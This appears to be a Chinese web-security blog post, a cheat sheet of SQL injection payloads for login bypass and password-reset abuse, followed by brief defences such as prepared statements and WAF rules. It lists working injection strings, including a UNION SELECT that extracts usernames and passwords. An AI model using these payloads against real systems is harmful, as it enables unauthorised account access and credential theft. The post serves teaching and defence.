【web安全】SQL注入与认证绕过

目录

一、SQL注入漏洞

[1.1 基础注入原理](#1.1 基础注入原理)

[1.2 实用注入Payload分类](#1.2 实用注入Payload分类)

逻辑绕过型

注释截断型

联合查询型

常见的万能密码-CSDN博客

二、登录绕过实战技巧

[2.1 基础绕过手法](#2.1 基础绕过手法)

[2.2 高级绕过技巧](#2.2 高级绕过技巧)

编码绕过

多重注释

参数污染

三、密码重置漏洞利用

[3.1 常见漏洞模式](#3.1 常见漏洞模式)

[3.2 实用Payload](#3.2 实用Payload)

四、防御方案精要

[4.1 开发防护](#4.1 开发防护)

[4.2 运维加固](#4.2 运维加固)

速查表


一、SQL注入漏洞

1.1 基础注入原理

SQL注入是通过构造特殊输入改变原始SQL语句逻辑的攻击方式。典型攻击模式:

sql 复制代码
原始语句:SELECT * FROM users WHERE username='[输入]' AND password='[输入]'
注入后: SELECT * FROM users WHERE username='admin'--' AND password='xxx'

1.2 实用注入Payload分类

逻辑绕过型
sql 复制代码
' OR 1=1 --
" OR "a"="a
' OR '1'='1
注释截断型
sql 复制代码
admin'#
admin'/*
admin'--
联合查询型
sql 复制代码
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--

常见的万能密码-CSDN博客

二、登录绕过实战技巧

2.1 基础绕过手法

sql 复制代码
admin' OR '1'='1
admin'--
admin'/*

2.2 高级绕过技巧

编码绕过
sql 复制代码
admin%27%20OR%201%3D1--
多重注释
sql 复制代码
admin'/*!OR*/1=1--
参数污染
sql 复制代码
username=admin'--&username=realuser

三、密码重置漏洞利用

3.1 常见漏洞模式

sql 复制代码
UPDATE users SET password='[新密码]' WHERE username='[输入]'
注入: UPDATE users SET password='hacked' WHERE username='admin'--'

3.2 实用Payload

sql 复制代码
admin'--
' OR email='admin@example.com
' OR 1=1 LIMIT 1--

四、防御方案精要

4.1 开发防护

sql 复制代码
// 使用预编译语句
String sql = "SELECT * FROM users WHERE username=?";
PreparedStatement stmt = conn.prepareStatement(sql);
stmt.setString(1, username);

4.2 运维加固

  1. 启用WAF规则过滤特殊字符

  2. 限制数据库账号权限

  3. 开启SQL执行日志审计

相关推荐
数字供应链安全产品选型5 小时前
关键领域清单+SBOM:834号令下软件供应链的“精准治理“逻辑与技术落地路径
人工智能·安全
byoass10 小时前
企业云盘与设计软件深度集成:AutoCAD/Revit/SolidWorks插件开发与API集成实战
服务器·网络·数据库·安全·oracle·云计算
Fullde福德负载箱厂家11 小时前
负载箱的需求分析与规格编制:用户应知的采购前期技术准备
安全·制造
ReaF_star11 小时前
【安全】SSL证书更新操作手册(Nginx+Cloudflare+acme.sh)
nginx·安全·ssl
盟接之桥12 小时前
什么是EDI(电子数据交换)|制造业场景解决方案
大数据·网络·安全·汽车·制造
捉鸭子12 小时前
某音a_bogus vmp逆向
爬虫·python·web安全·node.js·js
科技云报道12 小时前
安全进入“AI自主攻击”时代,瑞数信息如何用AI对抗AI
人工智能·安全
俺不要写代码12 小时前
数据库:DQL
数据库·sql·mysql
KnowSafe14 小时前
证书自动化解决方案哪家更可靠?
运维·服务器·安全·https·自动化·ssl
KnowSafe14 小时前
2026年证书自动化解决方案选型指南
运维·安全·自动化·ssl·itrustssl